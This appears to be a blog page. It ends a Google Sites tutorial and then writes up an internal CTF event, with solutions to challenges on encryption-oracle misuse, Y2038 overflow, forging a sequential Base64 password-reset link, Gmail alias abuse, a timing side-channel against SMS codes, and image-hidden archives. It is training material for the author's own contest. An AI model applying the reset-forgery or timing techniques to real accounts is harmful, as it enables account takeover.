7. Open a new browser and enter the URL to see if it can be accessed normally
If you see “This site can't be reached”, don't worry! Please wait a bit longer; if it still doesn't work after an hour, go back and check if there are any mistakes in the settings.
Done!
Subpages will automatically gather and display in the navigation menu
How to set it up?
Switch to the “Pages” tab on the right.
You can add a page and drag it under an existing page to make it a subpage, or click “…” to operate.
Select properties to customize the page path.
Enter the path name (EX: dev -> http://www.zhgchg.li/dev)
1. Header Settings
Hover over the navigation bar and select “ Add Header “
After adding the header, hover over the bottom left corner to change the image, enter the title text, and change the header type.
2. Footer Settings
Hover over the bottom of the page and select “ Edit Footer “ to enter footer information.
Note! Footer information is shared across the entire site, and the same content will be applied to all pages!
You can also click the “eye” icon in the bottom left corner to control whether to display the footer information on this page.
favicon
Website Title, Logo
How to set it?
Click the “ Gear (Settings) “ in the top right corner and select “ Brand Images “ to set it. Don’t forget to go back to the page and click “ Publish “ for the changes to take effect!
Last Updated Information
Page Anchor Link Tips
How to set it?
Click the “ Gear (Settings) “ in the top right corner and select “ Viewer Tools “ to set it. Don’t forget to go back to the page and click “ Publish “ for the changes to take effect!
1. Go to https://analytics.google.com/analytics/web/?authuser=0#/provision/SignUp to create a new GA account
2. Copy the GA Tracking ID after creation
3. Return to your Google Site settings page
Click the “ Gear (Settings) “ in the top right corner and select “ Analytics “ to enter the “ GA Tracking ID “. Don’t forget to go back to the page and click “ Publish “ for the changes to take effect!
Banner Announcement
How to set it?
Click the “ Gear (Settings) “ in the top right corner and select “ Announcement Banner “ to set it. Don’t forget to go back to the page and click “ Publish “ for the changes to take effect!
You can specify the banner message content, color, button text, link to click, whether to open in a new tab, and set it to display site-wide or only on the homepage.
Top right “Publish ▾”
You can review changes and publish them.
You can set whether to allow search engines to index and disable the content review page before each publish.
Gist as an example
But as mentioned in the fatal flaw above, an embedded iframe cannot adapt its height to the page size.
How to insert?
Select “Embed”
Choose embed code
You can enter JavaScript/HTML/CSS to create custom styled Button UI.
Additionally, selecting “Image” allows you to insert multiple images, which will be displayed in a waterfall flow (as seen on my City Corner page).
This is because the form contains a “ file upload “ item, which cannot be embedded in other pages using an iframe due to browser security issues; thus, it only shows the survey information and requires clicking the fill button to open a new window to complete the form.
The solution is to remove the file upload item, allowing the form to be filled out directly on the page.
EX: #lifesection, I want to place it at the top of the page for a table of contents or at the bottom for a GoTop button.
According to the official community, this is currently not possible. The button link can only 1. open an external link in a new window or 2. specify an internal page. Therefore, I later used subpages to split the directory.
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Building and brainstorming for Capture The Flag competitions
Capture The Flag, abbreviated as CTF, is a game originating from the West, commonly seen in paintball and first-person shooter games. The basic concept involves teams protecting their own flag while trying to capture the opponent’s flag. Applied to the field of computing, it becomes an “attack and defense” game where teams find and protect their vulnerabilities while attempting to exploit others to gain points.
The above describes a standard or even “advanced” CTF competition. However, running a CTF competition within a company involves additional practical considerations:
Considering these factors, rather than calling it a CTF competition, it is more like:
A team-based puzzle-solving event to accumulate flag points and promote interaction among engineers
This is an introductory-level CTF competition!
Items 3 and 4 are my personal additions. My expectation for this event is not just practical; I hope to enhance everyone’s enthusiasm for exploring and learning new things in a fun way, just like in daily work. We shouldn’t just be code monkeys but should strive for self-improvement and continuous progress!
After clarifying the event rules and goals, the next major task is how to create a CTF competition.
This part will be explained in two chapters: First, building a system to conduct the CTF competition, and Second, brainstorming competition questions.
This part requires knowledge of both front-end and back-end technologies. If you’re not familiar, you may need to ask colleagues for help.
Front-end: Semantic UI
Back-end: PHP + JSON files for data storage
Due to limited time, the competition system should be simple, stable, and quick to set up. The front-end interface uses the Semantic UI framework. The back-end is written in PHP without using a framework, and data is stored in JSON files instead of a database. This simplicity reduces potential issues (e.g., someone trying to hack the competition system to get answers).
Entry Page:
To make it fun, the entry page uses a reference from the BBC series Sherlock:
Phone unlock code S H E R
These four input boxes are for entering the team’s identification code (4 digits), e.g., Team 1: “1432”, Team 2: “8421”, to identify the team answering the questions.
As for the identification codes for each group, I have added a little twist. The identification codes are presented as follows:
Can you see the four-digit identification code? If not, please step back from the screen and take another look.
…….
……………
…………………
………………………
…………………………….
………………………………….
……………………………. .
……………………….
………………. .
…………
…….
. .
Answer: The identification code for the first group is 8291
After entering, you will be taken to the competition system homepage - the question list:
Top display: Team 1 group, remaining hint tickets
Middle question area: Question name, description, score for passing, lock time, purchase hints, hint display
Hovering the mouse will show time score, hint price
Bottom display: Total current score
Backend and other logic: The question list page will use Ajax to request the current answering status from the backend every second. The backend reads and records the answering status in the JSON file for each group. When unlocking a question, the time will be recorded. If the time has not arrived, other questions cannot be unlocked. When a question is answered correctly, the completion time, time score, and hint price will be written. The hint price will increase or decrease depending on the time spent.
The competition system is roughly like this, but the focus is not on the competition system, but on the questions themselves!
Whether it is interesting, whether everyone can participate, whether it is logical, whether it is novel… good questions are really hard to come up with.
Let’s get to the point!
First, let me introduce the 5 questions I came up with
1. The Gate to the Magic Academy
Question description: You will get a string of keys and need to find a way to use this key to solve the spell and enter it in the spell input box. There is a captcha field below that needs to be entered. Click verify to answer the question.
Answer:
This question tests security and encoding issues. It involves the use of encryption and decryption vulnerabilities in the platform. If all encryption and decryption on the website use the same method and key, we can use this weakness to decrypt the content and obtain the original data!
You can see that the captcha is served from ./image.php?token=AD0HbwdgVDw=, which effectively exposes a decryption interface. So we can try feeding it the encrypted key from the question:
You can get the decrypted string: LiveALifeYouWillRemember
Enter it into the spell input box to pass!
2. Please take me back to Shanghai in 1937!
Question description: You need to find a way to input the year/month/day and send it to the backend, making the backend recognize it as 1937. The year input range (1947~2099) cannot directly input 1937.
Answer:
This question is not about bypassing the frontend validation; the check is done on the backend, so it cannot be bypassed that way. It mainly tests the Year 2038 problem on 32-bit systems: a signed 32-bit timestamp can only represent dates up to January 19, 2038, 03:14:07, after which it overflows and wraps back to December 13, 1901. Calculating backward, any input from 2073-02-06 to 2074-02-05 wraps into 1937, so submitting a date within this range succeeds!
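A small sketch of the wraparound, using a hypothetical date inside that range:

import Foundation

var utc = Calendar(identifier: .gregorian)
utc.timeZone = TimeZone(identifier: "UTC")!

let input = utc.date(from: DateComponents(year: 2073, month: 6, day: 1))!   // what we actually submit
let raw = Int64(input.timeIntervalSince1970)                                 // about 3.26 billion, beyond Int32.max
let wrapped = Int32(truncatingIfNeeded: raw)                                 // overflows to a negative value
let seenByA32BitServer = Date(timeIntervalSince1970: TimeInterval(wrapped))
print(utc.component(.year, from: seenByA32BitServer))                        // 1937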
3. Catch Me If You Can
Problem Description: You need to find a way to receive a password reset email for a third-party email account (one you cannot log into) and complete the password reset for someone else.
Solution:
This problem requires more sensitivity. First, use an email account you can receive emails with to request a password reset; the email we receive is as follows:
Your password reset link: http://ctf.zhgchg.li/10/reset.php?requestid=OTk= If this is not related to you, please ignore this email, thank you!
+
We can see that the password reset request is identified through the requestid parameter. The value we get is OTk=, which looks like Base64? Let's try decoding it:
We can get the value of the parameter as 99. Requesting a password reset again gives us 100, so we can infer that the password reset request is sequential. The next number is 101. At this point, go back to the email account you want to bypass and request a password reset. We can then forge a password reset link and secretly reset someone else’s password.
Encode 101 to Base64 => MTAx, forge the URL http://ctf.zhgchg.li/10/reset.php?requestid=MTAx, enter any password, and click reset to pass!
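In code, the decode-and-forge steps look roughly like this (the URL is the one from the challenge; the sequence number is the predicted next value):

import Foundation

// Decode the token from our own reset email: "OTk=" -> "99"
let current = String(data: Data(base64Encoded: "OTk=")!, encoding: .utf8)!

// Predict the victim's sequence number and forge the link: "101" -> "MTAx"
let forgedToken = Data("101".utf8).base64EncodedString()
let forgedLink = "http://ctf.zhgchg.li/10/reset.php?requestid=\(forgedToken)"
print(current, forgedLink)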
4. Alias Master
Problem Description: You need to generate 10 sets of Gmail accounts (Gmail hosted mailboxes) to receive the answer email.
Solution:
This problem can certainly be brute-forced, but company emails cannot be registered at will; unless you find 10 people to help you receive emails, you cannot solve it.
The key to this problem is Gmail accounts/Gmail-hosted mailboxes. Since company emails are Gmail-hosted mailboxes, they share the characteristics of Gmail accounts: you can use "." and "+" to create unlimited alias addresses. "." can be placed anywhere in the local part, and "+" can be appended at the end followed by any text.
For example, if the main email is zhgchgli@gmail.com, then z.hgchgli@gmail.com, zh.gchgli@gmail.com, zhgchgli+1@gmail.com, zhgchgli+25@gmail.com… will all be delivered to the main mailbox zhgchgli@gmail.com. One email can create multiple identities!
This problem mainly reminds everyone to filter out these characters when registering accounts to prevent malicious people from registering a large number of fake accounts.
After receiving 10 emails, you can combine them to find the URL of the answer. Enter the URL to pass!
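On the defensive side mentioned above, a sketch of collapsing Gmail-style aliases into one canonical address before checking whether an account already exists:

import Foundation

func canonicalGmailAddress(_ email: String) -> String {
    let parts = email.lowercased().split(separator: "@", maxSplits: 1)
    guard parts.count == 2 else { return email.lowercased() }
    var local = String(parts[0])
    if let plusIndex = local.firstIndex(of: "+") {
        local = String(local[..<plusIndex])                     // Gmail ignores "+tag"
    }
    local = local.replacingOccurrences(of: ".", with: "")       // Gmail ignores dots in the local part
    return "\(local)@\(parts[1])"
}

// canonicalGmailAddress("z.hgchg.li+25@gmail.com") == "zhgchgli@gmail.com"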
5. Time Machine
Problem Description: Similar to Problem 3, you need to find a way to receive a 4-digit SMS verification code for a third-party phone number (one you cannot receive SMS for) and complete the login for someone else’s account.
Solution:
This problem is relatively obscure and difficult, mainly simulating a side-channel timing attack. The system's login verification includes complex algorithms, and there is a measurable time difference when processing the verification code (for example, if the first digit is correct it takes longer to process; if everything is wrong it returns immediately). By observing these time differences, we start from 0000 and try one digit at a time. When we try 2000, it takes one second to process, so we know the first digit is 2. Continue with 2100, still one second; 2200 takes even longer, two seconds… Keep going for the third and fourth digits, and finally we get the answer 2256.
This problem only simulates this type of attack; the backend simply uses sleep to create the delay rather than running a genuinely heavy algorithm. In practice this kind of attack is rarely seen against web pages or apps: the processing is usually not heavy enough to produce a noticeable time difference, and network jitter makes the timing hard to judge.
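A toy model of the greedy digit-by-digit search described above; the server-side sleep here stands in for the real, slow verification:

import Foundation

let secret = "2256"

// Fake "server": the more leading digits are correct, the longer it takes to answer.
func verificationTime(for guess: String) -> TimeInterval {
    let correctPrefix = zip(guess, secret).prefix(while: { $0.0 == $0.1 }).count
    let start = Date()
    Thread.sleep(forTimeInterval: Double(correctPrefix) * 0.05)
    return Date().timeIntervalSince(start)
}

var known = ""
for position in 0..<4 {
    let padding = String(repeating: "0", count: 3 - position)
    // Keep the digit whose request took the longest.
    let best = "0123456789".max {
        verificationTime(for: known + String($0) + padding) < verificationTime(for: known + String($1) + padding)
    }!
    known.append(best)
}
print(known) // 2256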
For more details on side-channel attacks, you can refer to this article:
Understand CORB in 30 Minutes — Side-Channel Attacks
The above are the 5 questions I came up with. Below, I will continue to introduce the remaining 7 questions provided by my colleagues.
1. Sadako Appearance
Sadako image sourced from the internet
Question Description: The question is just a picture of Sadako. You need to enter what Sadako wants to say in the dialogue box above to pass.
Answer:
This question tests whether you know the concept of embedding other information in an image. The key lies in the original image:
Sadako image sourced from the internet
This image has secretly compressed a text file inside it (for the actual method, please refer to: How To Hide A ZIP File Inside An Image On Mac [Quicktip], note the Win/Mac issue here).
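A sketch of how such a file can be produced, simply appending the archive bytes after the image bytes (file names are hypothetical):

import Foundation

do {
    var combined = try Data(contentsOf: URL(fileURLWithPath: "sadako.jpg"))
    combined.append(try Data(contentsOf: URL(fileURLWithPath: "secret.zip")))
    try combined.write(to: URL(fileURLWithPath: "sadako_with_secret.jpg"))
    // Image viewers stop at the end of the image data, but unzip scans for the
    // ZIP signature, so extracting the combined file reveals secret.zip's contents.
} catch {
    print(error)
}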
So we just need to simply unzip this image to get the passphrase:
Enter “YOUHAVENOIDEA” in the input box to pass!
Supplement:
Regarding hiding information in images, there is another method, using “ Steganography”
Steganography and Malware: Principles and Methods
In simple terms, it hides information by manipulating the color values of pixel color codes. The actual image has changed, but the naked eye cannot distinguish it.
This question also has hidden codes in the image to prevent people from going in this direction. Those who follow this path can get a hint:
Upload the image to an online steganography decoding tool to get the hint.
2. Caesar’s Morse Code
Image sourced from the internet
Question Description: Try to decipher the meaning of the Morse code provided in the question (a sentence in English).
Answer:
This question is quite straightforward. The first step is to decode the Morse code into the English letters “VYYXI DN HT GDAZ”. Then perform Caesar cipher decryption: when we try a shift of 5, we get a meaningful English sentence, “addcn is my life”, which is the answer!
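A sketch of brute-forcing the shift on the decoded Morse text (uppercase letters assumed); shift 5 is the one that reads as English:

func caesarShift(_ text: String, by shift: Int) -> String {
    let base = Int(Character("A").asciiValue!)   // 65
    return String(text.map { character -> Character in
        guard character.isLetter, let scalar = character.unicodeScalars.first else { return character }
        let shifted = (Int(scalar.value) - base + shift) % 26 + base
        return Character(UnicodeScalar(UInt8(shifted)))
    })
}

for shift in 1...25 {
    print(shift, caesarShift("VYYXI DN HT GDAZ", by: shift))   // shift 5 -> "ADDCN IS MY LIFE"
}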
3. What do you think it is?
Opening this question’s webpage shows a bunch of garbled text, as follows:
data:image/png;base64,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